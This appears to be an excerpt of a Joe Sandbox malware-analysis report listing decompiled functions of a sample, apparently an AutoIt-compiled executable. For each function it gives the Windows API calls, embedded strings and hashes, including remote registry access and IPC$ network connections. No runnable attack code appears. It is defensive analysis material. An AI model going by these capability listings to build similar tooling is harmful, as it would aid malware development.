                                                                                                                • Opcode ID: 0a74c394d74e847e559cccf32159827379c1d7954c6119b7c78de1938fc371b4
                                                                                                                • Instruction ID: 4e115ee414d4b4a8dff7ff6f9b8c745b3f5d94f01e641fd89f14b5dec2e42ffa
                                                                                                                • Opcode Fuzzy Hash: 0a74c394d74e847e559cccf32159827379c1d7954c6119b7c78de1938fc371b4
                                                                                                                • Instruction Fuzzy Hash: 57414975604208EFDB119FA5EC98EAABBBCFF89711F104068F905D7260E7709D41EB20
                                                                                                                APIs
                                                                                                                • __wsplitpath.LIBCMT ref: 0094DA10
                                                                                                                • _wcscat.LIBCMT ref: 0094DA28
                                                                                                                • _wcscat.LIBCMT ref: 0094DA3A
                                                                                                                • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 0094DA4F
                                                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 0094DA63
                                                                                                                • GetFileAttributesW.KERNEL32(?), ref: 0094DA7B
                                                                                                                • SetFileAttributesW.KERNEL32(?,00000000), ref: 0094DA95
                                                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 0094DAA7
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                                                                                                                • String ID: *.*
                                                                                                                • API String ID: 34673085-438819550
                                                                                                                • Opcode ID: 83231722231ef8c82bd39d8f0a77ca58e0ecda2c76750cabf59b902d11c796d8
                                                                                                                • Instruction ID: fe4b13dbf0ae8aab8f8f4ebf1cdacb529191ab64815bf9e8019afa3976582b8c
                                                                                                                • Opcode Fuzzy Hash: 83231722231ef8c82bd39d8f0a77ca58e0ecda2c76750cabf59b902d11c796d8
                                                                                                                • Instruction Fuzzy Hash: B381807650A2419FCB24EF68C844EAAB7E8FF89310F184C2EF889C7251E674DD44CB52
                                                                                                                APIs
                                                                                                                  • Part of subcall function 008E2612: GetWindowLongW.USER32(?,000000EB), ref: 008E2623
                                                                                                                • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 0096C1FC
                                                                                                                • GetFocus.USER32 ref: 0096C20C
                                                                                                                • GetDlgCtrlID.USER32(00000000), ref: 0096C217
                                                                                                                • _memset.LIBCMT ref: 0096C342
                                                                                                                • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 0096C36D
                                                                                                                • GetMenuItemCount.USER32(?), ref: 0096C38D
                                                                                                                • GetMenuItemID.USER32(?,00000000), ref: 0096C3A0
                                                                                                                • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 0096C3D4
                                                                                                                • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 0096C41C
                                                                                                                • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0096C454
                                                                                                                • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 0096C489
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                                                                                                                • String ID: 0
                                                                                                                • API String ID: 1296962147-4108050209
                                                                                                                • Opcode ID: 9b86b8a1198ffbc8f3e80c829ec476c11959c958ca180b0aea5849947c1c7b77
                                                                                                                • Instruction ID: 1284d93c0293074b131f0e45eba703b0c773e85e0e1145d6fcdc9ab2b6eb1a2d
                                                                                                                • Opcode Fuzzy Hash: 9b86b8a1198ffbc8f3e80c829ec476c11959c958ca180b0aea5849947c1c7b77
                                                                                                                • Instruction Fuzzy Hash: 67818BB0209301AFD710CF24D894A7BBBE8FF89754F00492EF995972A1DB70D905DBA2
                                                                                                                APIs
                                                                                                                • GetDC.USER32(00000000), ref: 0095738F
                                                                                                                • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 0095739B
                                                                                                                • CreateCompatibleDC.GDI32(?), ref: 009573A7
                                                                                                                • SelectObject.GDI32(00000000,?), ref: 009573B4
                                                                                                                • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00957408
                                                                                                                • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 00957444
                                                                                                                • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00957468
                                                                                                                • SelectObject.GDI32(00000006,?), ref: 00957470
                                                                                                                • DeleteObject.GDI32(?), ref: 00957479
                                                                                                                • DeleteDC.GDI32(00000006), ref: 00957480
                                                                                                                • ReleaseDC.USER32(00000000,?), ref: 0095748B
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                                                                • String ID: (
                                                                                                                • API String ID: 2598888154-3887548279
                                                                                                                • Opcode ID: 6477cea5464fdee88a0525e854ba21a0949e2f63a982ed320a8fdd4d2daa403d
                                                                                                                • Instruction ID: 2832391357c7b8fb0a3a96a265b6b88784cb2da9f32c93de73104d5d7418e896
                                                                                                                • Opcode Fuzzy Hash: 6477cea5464fdee88a0525e854ba21a0949e2f63a982ed320a8fdd4d2daa403d
                                                                                                                • Instruction Fuzzy Hash: F1515A75908309EFCB14CFA9EC84EAEBBB9EF48310F14842DF95997210C771A944DB50
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00900957: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,008E6B0C,?,00008000), ref: 00900973
                                                                                                                  • Part of subcall function 008E4750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,008E4743,?,?,008E37AE,?), ref: 008E4770
                                                                                                                • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 008E6BAD
                                                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 008E6CFA
                                                                                                                  • Part of subcall function 008E586D: _wcscpy.LIBCMT ref: 008E58A5
                                                                                                                  • Part of subcall function 0090363D: _iswctype.LIBCMT ref: 00903645
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
                                                                                                                • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                                                                                • API String ID: 537147316-1018226102
                                                                                                                • Opcode ID: 29d0dbaaa676cf29aa844036a5b0858f80cb0366e5cb0bb9746acae20ecdd67c
                                                                                                                • Instruction ID: 7b78492a2d0451dee1d0788e4598538a965feb3f5e53ad30de599dbffdb86653
                                                                                                                • Opcode Fuzzy Hash: 29d0dbaaa676cf29aa844036a5b0858f80cb0366e5cb0bb9746acae20ecdd67c
                                                                                                                • Instruction Fuzzy Hash: C9028A306083859FC710EF25C891AAFBBE5FF96358F50481DF49A972A1DB30D989CB52
                                                                                                                APIs
                                                                                                                • _memset.LIBCMT ref: 00942D50
                                                                                                                • GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 00942DDD
                                                                                                                • GetMenuItemCount.USER32(009A5890), ref: 00942E66
                                                                                                                • DeleteMenu.USER32(009A5890,00000005,00000000,000000F5,?,?), ref: 00942EF6
                                                                                                                • DeleteMenu.USER32(009A5890,00000004,00000000), ref: 00942EFE
                                                                                                                • DeleteMenu.USER32(009A5890,00000006,00000000), ref: 00942F06
                                                                                                                • DeleteMenu.USER32(009A5890,00000003,00000000), ref: 00942F0E
                                                                                                                • GetMenuItemCount.USER32(009A5890), ref: 00942F16
                                                                                                                • SetMenuItemInfoW.USER32(009A5890,00000004,00000000,00000030), ref: 00942F4C
                                                                                                                • GetCursorPos.USER32(?), ref: 00942F56
                                                                                                                • SetForegroundWindow.USER32(00000000), ref: 00942F5F
                                                                                                                • TrackPopupMenuEx.USER32(009A5890,00000000,?,00000000,00000000,00000000), ref: 00942F72
                                                                                                                • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00942F7E
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
                                                                                                                • String ID:
                                                                                                                • API String ID: 3993528054-0
                                                                                                                • Opcode ID: f7717ee33649b9530cdd739645c464e757459f2c701bf86881635347e06e5463
                                                                                                                • Instruction ID: aba4deef887a8470424c4fdbd6f18e34108ed35b27141b2ea26150294a5bcfd4
                                                                                                                • Opcode Fuzzy Hash: f7717ee33649b9530cdd739645c464e757459f2c701bf86881635347e06e5463
                                                                                                                • Instruction Fuzzy Hash: 38712970604205BFEB258F54DC85FABBF68FF44324F94021AF625AA1E1C7B15C60DBA4
                                                                                                                APIs
                                                                                                                  • Part of subcall function 008E7BCC: _memmove.LIBCMT ref: 008E7C06
                                                                                                                • _memset.LIBCMT ref: 0093786B
                                                                                                                • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 009378A0
                                                                                                                • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 009378BC
                                                                                                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 009378D8
                                                                                                                • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00937902
                                                                                                                • CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 0093792A
                                                                                                                • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00937935
                                                                                                                • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0093793A
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_memset
                                                                                                                • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                                                                • API String ID: 1411258926-22481851
                                                                                                                • Opcode ID: e46868541ba4b9df3a95552a48cbaae61793a8a7b9b97e4b5aa0b4a9a12b1517
                                                                                                                • Instruction ID: d9ab6ce82e22db946659eaa3ed51a15443f6e2957a4bc893e6bcd54721a548de
                                                                                                                • Opcode Fuzzy Hash: e46868541ba4b9df3a95552a48cbaae61793a8a7b9b97e4b5aa0b4a9a12b1517
                                                                                                                • Instruction Fuzzy Hash: 8B412572814229AADF21EBE9EC95DEDB7B8FF04354F004029E906A7161EB709E04CB90
                                                                                                                APIs
                                                                                                                • CharUpperBuffW.USER32(?,?,?,?,?,?,?,0095FDAD,?,?), ref: 00960E31
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: BuffCharUpper
                                                                                                                • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                                                                • API String ID: 3964851224-909552448
                                                                                                                • Opcode ID: 41a16aad7b8d3fdb1284f0f13f9426408301232ee751ff463a2f23ca0c1fd8b6
                                                                                                                • Instruction ID: e48fa69d65257b6c194cc89bf0fc8533c4c5dc188ae76c01b094ee8bb0e4a05f
                                                                                                                • Opcode Fuzzy Hash: 41a16aad7b8d3fdb1284f0f13f9426408301232ee751ff463a2f23ca0c1fd8b6
                                                                                                                • Instruction Fuzzy Hash: 7F414A3121039A8BCF21EF58D996AEF37A4AF92304F140418FC555B292DB349A1ACBA1
                                                                                                                APIs
                                                                                                                • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,0091E2A0,00000010,?,Bad directive syntax error,0096F910,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 0093F7C2
                                                                                                                • LoadStringW.USER32(00000000,?,0091E2A0,00000010), ref: 0093F7C9
                                                                                                                  • Part of subcall function 008E7DE1: _memmove.LIBCMT ref: 008E7E22
                                                                                                                • _wprintf.LIBCMT ref: 0093F7FC
                                                                                                                • __swprintf.LIBCMT ref: 0093F81E
                                                                                                                • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 0093F88D
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: HandleLoadMessageModuleString__swprintf_memmove_wprintf
                                                                                                                • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                                                                • API String ID: 1506413516-4153970271
                                                                                                                • Opcode ID: 9061db71505c3cff3b4d5499767288ff1d219e26e136748f36d6e4e73bcabc28
                                                                                                                • Instruction ID: f565c46529f45c40d2fab6a88e1684bacd01a5fc9132bafb1711c2748c8f30b0
                                                                                                                • Opcode Fuzzy Hash: 9061db71505c3cff3b4d5499767288ff1d219e26e136748f36d6e4e73bcabc28
                                                                                                                • Instruction Fuzzy Hash: BA218F3290421EBFCF11EF94CC1AEEE7779FF15304F04046AF516A60A2DA719618DB51
                                                                                                                APIs
                                                                                                                  • Part of subcall function 008E7BCC: _memmove.LIBCMT ref: 008E7C06
                                                                                                                  • Part of subcall function 008E7924: _memmove.LIBCMT ref: 008E79AD
                                                                                                                • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00945330
                                                                                                                • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00945346
                                                                                                                • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00945357
                                                                                                                • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00945369
                                                                                                                • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0094537A
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: SendString$_memmove
                                                                                                                • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                                                                • API String ID: 2279737902-1007645807
                                                                                                                • Opcode ID: cb6b50ce7d6f49f1b2a3783877696137b4be973616cdf92532cf9156aba5b8da
                                                                                                                • Instruction ID: c556eb42424b7c897635379a7c8fa024756f6c97082eb4286368cdada27ff38b
                                                                                                                • Opcode Fuzzy Hash: cb6b50ce7d6f49f1b2a3783877696137b4be973616cdf92532cf9156aba5b8da
                                                                                                                • Instruction Fuzzy Hash: A0118621950159BADB20BBAADC49DFFBB7CFBD7B44F100419B411D60E2EEA04D05C561
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                                                                                                • String ID: 0.0.0.0
                                                                                                                • API String ID: 208665112-3771769585
                                                                                                                • Opcode ID: c8b9f036f534687e1aaed84f20931c1aeacd3f98fcf9c310a90854ced8f9edad
                                                                                                                • Instruction ID: 7bfc1dd2b110e14e8b36b5b1ecc8d6d44ea21fc63f91a6ad32ed3d87ad8d4543
                                                                                                                • Opcode Fuzzy Hash: c8b9f036f534687e1aaed84f20931c1aeacd3f98fcf9c310a90854ced8f9edad
                                                                                                                • Instruction Fuzzy Hash: 7811E431514114AFDB24AB70EC4AFEA77BCEF82711F0401BAF549960E1FFB19E829A50
                                                                                                                APIs
                                                                                                                • timeGetTime.WINMM ref: 00944F7A
                                                                                                                  • Part of subcall function 0090049F: timeGetTime.WINMM(?,7694B400,008F0E7B), ref: 009004A3
                                                                                                                • Sleep.KERNEL32(0000000A), ref: 00944FA6
                                                                                                                • EnumThreadWindows.USER32(?,Function_00064F28,00000000), ref: 00944FCA
                                                                                                                • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00944FEC
                                                                                                                • SetActiveWindow.USER32 ref: 0094500B
                                                                                                                • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00945019
                                                                                                                • SendMessageW.USER32(00000010,00000000,00000000), ref: 00945038
                                                                                                                • Sleep.KERNEL32(000000FA), ref: 00945043
                                                                                                                • IsWindow.USER32 ref: 0094504F
                                                                                                                • EndDialog.USER32(00000000), ref: 00945060
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                                                                • String ID: BUTTON
                                                                                                                • API String ID: 1194449130-3405671355
                                                                                                                • Opcode ID: c88be563b50b12d48efcb977a07e9c4cd378fb7f84401619eca2dfdab0a65632
                                                                                                                • Instruction ID: 776c6ed5d87545c76b9eddf69f3af2748af34347cf5fca3a822219e545687c0b
                                                                                                                • Opcode Fuzzy Hash: c88be563b50b12d48efcb977a07e9c4cd378fb7f84401619eca2dfdab0a65632
                                                                                                                • Instruction Fuzzy Hash: 3D21AE7462C605BFE7106F70FC99F263B69EF46745F0A2028F506821F1DBB18D14EAA2
                                                                                                                APIs
                                                                                                                  • Part of subcall function 008E9837: __itow.LIBCMT ref: 008E9862
                                                                                                                  • Part of subcall function 008E9837: __swprintf.LIBCMT ref: 008E98AC
                                                                                                                • CoInitialize.OLE32(00000000), ref: 0094D5EA
                                                                                                                • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 0094D67D
                                                                                                                • SHGetDesktopFolder.SHELL32(?), ref: 0094D691
                                                                                                                • CoCreateInstance.OLE32(00972D7C,00000000,00000001,00998C1C,?), ref: 0094D6DD
                                                                                                                • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 0094D74C
                                                                                                                • CoTaskMemFree.OLE32(?,?), ref: 0094D7A4
                                                                                                                • _memset.LIBCMT ref: 0094D7E1
                                                                                                                • SHBrowseForFolderW.SHELL32(?), ref: 0094D81D
                                                                                                                • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 0094D840
                                                                                                                • CoTaskMemFree.OLE32(00000000), ref: 0094D847
                                                                                                                • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 0094D87E
                                                                                                                • CoUninitialize.OLE32(00000001,00000000), ref: 0094D880
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                                                                                                • String ID:
                                                                                                                • API String ID: 1246142700-0
                                                                                                                • Opcode ID: d49e06902a0ab506d060e6e69152a17f31e0db92631e903effdbed8080d814b3
                                                                                                                • Instruction ID: ca93fd57c3aa1064d0c85977c4106d48de049dae232557bd4630eb0820e2317e
                                                                                                                • Opcode Fuzzy Hash: d49e06902a0ab506d060e6e69152a17f31e0db92631e903effdbed8080d814b3
                                                                                                                • Instruction Fuzzy Hash: 5EB11D75A00119AFDB04DFA8C898DAEBBB9FF49314F148469F909DB261DB70ED41CB50
                                                                                                                APIs
                                                                                                                • GetDlgItem.USER32(?,00000001), ref: 0093C283
                                                                                                                • GetWindowRect.USER32(00000000,?), ref: 0093C295
                                                                                                                • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 0093C2F3
                                                                                                                • GetDlgItem.USER32(?,00000002), ref: 0093C2FE
                                                                                                                • GetWindowRect.USER32(00000000,?), ref: 0093C310
                                                                                                                • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 0093C364
                                                                                                                • GetDlgItem.USER32(?,000003E9), ref: 0093C372
                                                                                                                • GetWindowRect.USER32(00000000,?), ref: 0093C383
                                                                                                                • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 0093C3C6
                                                                                                                • GetDlgItem.USER32(?,000003EA), ref: 0093C3D4
